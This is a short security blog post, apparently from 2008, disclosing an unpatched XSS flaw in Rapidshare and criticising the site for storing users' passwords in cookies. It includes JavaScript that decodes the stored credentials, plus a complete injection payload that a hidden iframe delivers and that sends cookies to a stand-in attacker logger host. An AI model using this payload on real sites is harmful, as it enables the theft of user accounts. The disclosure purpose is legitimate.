As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it had been reported to the site owners. But what can you expect by people who stores both your username and password inside your cookie? Yes, check it by yourself: a Rapidshare cookie is something like user=12345-%36%37%38%39%30. In Javascript, cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16))) Therefore, for a given cookie, access credentials are just var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd); This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of Rapidshare users, I own an insane lot of accounts in a blink: var injection = "<script>(" + (function() { new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" + escape(document.cookie); }) + ")()</scr" + "ipt>" var iframe = document.body.appendChild(document.createElement("iframe")); iframe.style.visibility = "hidden"; iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" + encodeURIComponent(injection); But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites… 15\07\2008 ©http://hackademix.net/ translated into russian here
